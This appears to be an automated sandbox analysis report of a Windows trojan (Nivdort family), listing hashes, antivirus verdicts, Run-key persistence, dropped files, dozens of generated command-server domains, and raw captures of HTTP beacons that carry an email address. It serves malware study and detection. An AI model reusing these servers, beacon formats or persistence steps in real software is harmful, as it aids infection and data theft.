Analysis Date2015-08-13 06:55:56
MD56261acdd356f876e141027b38febe918
SHA147187e55e4f8de69e881d8596a79d48ceb38cfc7

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 022d606851c6acff831bff6f2c17f181 sha1: a48e15d25697c3a7e9dbf67d70ded5a7ab49c613 size: 295424
Section.rdata md5: 43f40f5f714a96e7ad7eb4a445aed207 sha1: 6f81ae90ec3a0182372a131e43497afa184135be size: 33280
Section.data md5: e6b58a9cb8092f5ddee11c78e745b7a8 sha1: 89b60b7f6fbad06517c51e6a075f9c01049c898e size: 107008
Timestamp2014-10-30 10:25:27
PackerMicrosoft Visual C++ ?.?
PEhash036acdc1c26ea44bac9e22c3fdc46819328d5d7f
IMPhash5e054b69c5566c4f30fa9350a139dbdc
AVCA (E-Trust Ino)no_virus
AVF-SecureGen:Variant.Symmi.22722
AVDr. WebTrojan.DownLoader13.16234
AVClamAVno_virus
AVArcabit (arcavir)Gen:Variant.Symmi.22722
AVBullGuardGen:Variant.Symmi.22722
AVPadvishno_virus
AVVirusBlokAda (vba32)no_virus
AVCAT (quickheal)Trojan.Dynamer.AC3
AVTrend MicroTROJ_FORUCON.BMC
AVKasperskyTrojan.Win32.Generic
AVZillya!no_virus
AVEmsisoftGen:Variant.Symmi.22722
AVIkarusTrojan.FBAccountLock
AVFrisk (f-prot)no_virus
AVAuthentiumW32/Wonton.B.gen!Eldorado
AVMalwareBytesTrojan.Zbot.WHE
AVMicroWorld (escan)Gen:Variant.Symmi.22722
AVMicrosoft Security EssentialsTrojanSpy:Win32/Nivdort.BD
AVK7Trojan ( 004cb2771 )
AVBitDefenderGen:Variant.Symmi.22722
AVFortinetW32/Agent.VNC!tr
AVSymantecDownloader.Upatre!g15
AVGrisoft (avg)Win32/Cryptor
AVEset (nod32)Win32/Agent.VNC
AVAlwil (avast)Malware-gen:Win32:Malware-gen
AVAd-AwareGen:Variant.Symmi.22722
AVTwisterno_virus
AVAvira (antivir)TR/AD.Nivdort.M.7
AVMcafeeTrojan-FEMT!6261ACDD356F
AVRisingno_virus

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Drive Disk Studio Presentation WMI ➝
C:\Documents and Settings\Administrator\Application Data\swqiagdhdmfzcuy\iywppyrxeags.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\swqiagdhdmfzcuy\iywppyrxeags.exe
Creates ProcessC:\Documents and Settings\Administrator\Application Data\swqiagdhdmfzcuy\iywppyrxeags.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\swqiagdhdmfzcuy\iywppyrxeags.exe

Creates FileC:\Documents and Settings\Administrator\Application Data\swqiagdhdmfzcuy\vdvstgbo.exe
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Application Data\swqiagdhdmfzcuy\iywppyrxeags.zw
Creates ProcessWATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\swqiagdhdmfzcuy\iywppyrxeags.exe"

Process
↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\swqiagdhdmfzcuy\iywppyrxeags.exe"

Network Details:

DNScigaretteapple.net
Type: A
195.22.26.231
DNScigaretteapple.net
Type: A
195.22.26.252
DNScigaretteapple.net
Type: A
195.22.26.253
DNScigaretteapple.net
Type: A
195.22.26.254
DNSpersonmeasure.net
Type: A
184.168.221.35
DNSmachinemeasure.net
Type: A
95.211.230.75
DNSbecausefather.net
Type: A
DNSexpectapple.net
Type: A
DNSbecauseapple.net
Type: A
DNSexpectbuilt.net
Type: A
DNSbecausebuilt.net
Type: A
DNSexpectcarry.net
Type: A
DNSbecausecarry.net
Type: A
DNSpersonfather.net
Type: A
DNSmachinefather.net
Type: A
DNSpersonapple.net
Type: A
DNSmachineapple.net
Type: A
DNSpersonbuilt.net
Type: A
DNSmachinebuilt.net
Type: A
DNSpersoncarry.net
Type: A
DNSmachinecarry.net
Type: A
DNSsuddenfather.net
Type: A
DNSforeignfather.net
Type: A
DNSsuddenapple.net
Type: A
DNSforeignapple.net
Type: A
DNSsuddenbuilt.net
Type: A
DNSforeignbuilt.net
Type: A
DNSsuddencarry.net
Type: A
DNSforeigncarry.net
Type: A
DNSwhetherfather.net
Type: A
DNSrightfather.net
Type: A
DNSwhetherapple.net
Type: A
DNSrightapple.net
Type: A
DNSwhetherbuilt.net
Type: A
DNSrightbuilt.net
Type: A
DNSwhethercarry.net
Type: A
DNSrightcarry.net
Type: A
DNSfigurefather.net
Type: A
DNSthoughfather.net
Type: A
DNSfigureapple.net
Type: A
DNSthoughapple.net
Type: A
DNSfigurebuilt.net
Type: A
DNSthoughbuilt.net
Type: A
DNSfigurecarry.net
Type: A
DNSthoughcarry.net
Type: A
DNSpicturefather.net
Type: A
DNScigarettefather.net
Type: A
DNSpictureapple.net
Type: A
DNSpicturebuilt.net
Type: A
DNScigarettebuilt.net
Type: A
DNSpicturecarry.net
Type: A
DNScigarettecarry.net
Type: A
DNSchildrenfather.net
Type: A
DNSfamilyfather.net
Type: A
DNSchildrenapple.net
Type: A
DNSfamilyapple.net
Type: A
DNSchildrenbuilt.net
Type: A
DNSfamilybuilt.net
Type: A
DNSchildrencarry.net
Type: A
DNSfamilycarry.net
Type: A
DNSeitherfather.net
Type: A
DNSenglishfather.net
Type: A
DNSeitherapple.net
Type: A
DNSenglishapple.net
Type: A
DNSeitherbuilt.net
Type: A
DNSenglishbuilt.net
Type: A
DNSeithercarry.net
Type: A
DNSenglishcarry.net
Type: A
DNSexpectmeasure.net
Type: A
DNSbecausemeasure.net
Type: A
DNSexpectdinner.net
Type: A
DNSbecausedinner.net
Type: A
DNSexpectafraid.net
Type: A
DNSbecauseafraid.net
Type: A
DNSexpectcircle.net
Type: A
DNSbecausecircle.net
Type: A
DNSpersondinner.net
Type: A
DNSmachinedinner.net
Type: A
DNSpersonafraid.net
Type: A
DNSmachineafraid.net
Type: A
DNSpersoncircle.net
Type: A
DNSmachinecircle.net
Type: A
DNSsuddenmeasure.net
Type: A
DNSforeignmeasure.net
Type: A
DNSsuddendinner.net
Type: A
DNSforeigndinner.net
Type: A
DNSsuddenafraid.net
Type: A
DNSforeignafraid.net
Type: A
HTTP GEThttp://cigaretteapple.net/index.php?email=office@moldoglass.ro&method=post&len
User-Agent:
HTTP GEThttp://personmeasure.net/index.php?email=office@moldoglass.ro&method=post&len
User-Agent:
HTTP GEThttp://machinemeasure.net/index.php?email=office@moldoglass.ro&method=post&len
User-Agent:
Flows TCP192.168.1.1:1031 ➝ 195.22.26.231:80
Flows TCP192.168.1.1:1032 ➝ 184.168.221.35:80
Flows TCP192.168.1.1:1033 ➝ 95.211.230.75:80

Raw Pcap
0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6f6666 69636540 6d6f6c64   mail=office@mold
0x00000020 (00032)   6f676c61 73732e72 6f266d65 74686f64   oglass.ro&method
0x00000030 (00048)   3d706f73 74266c65 6e204854 54502f31   =post&len HTTP/1
0x00000040 (00064)   2e300d0a 41636365 70743a20 2a2f2a0d   .0..Accept: */*.
0x00000050 (00080)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000060 (00096)   73650d0a 486f7374 3a206369 67617265   se..Host: cigare
0x00000070 (00112)   74746561 70706c65 2e6e6574 0d0a0d0a   tteapple.net....
0x00000080 (00128)                                         

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6f6666 69636540 6d6f6c64   mail=office@mold
0x00000020 (00032)   6f676c61 73732e72 6f266d65 74686f64   oglass.ro&method
0x00000030 (00048)   3d706f73 74266c65 6e204854 54502f31   =post&len HTTP/1
0x00000040 (00064)   2e300d0a 41636365 70743a20 2a2f2a0d   .0..Accept: */*.
0x00000050 (00080)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000060 (00096)   73650d0a 486f7374 3a207065 72736f6e   se..Host: person
0x00000070 (00112)   6d656173 7572652e 6e65740d 0a0d0a0a   measure.net.....
0x00000080 (00128)                                         

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6f6666 69636540 6d6f6c64   mail=office@mold
0x00000020 (00032)   6f676c61 73732e72 6f266d65 74686f64   oglass.ro&method
0x00000030 (00048)   3d706f73 74266c65 6e204854 54502f31   =post&len HTTP/1
0x00000040 (00064)   2e300d0a 41636365 70743a20 2a2f2a0d   .0..Accept: */*.
0x00000050 (00080)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000060 (00096)   73650d0a 486f7374 3a206d61 6368696e   se..Host: machin
0x00000070 (00112)   656d6561 73757265 2e6e6574 0d0a0d0a   emeasure.net....
0x00000080 (00128)                                         


Strings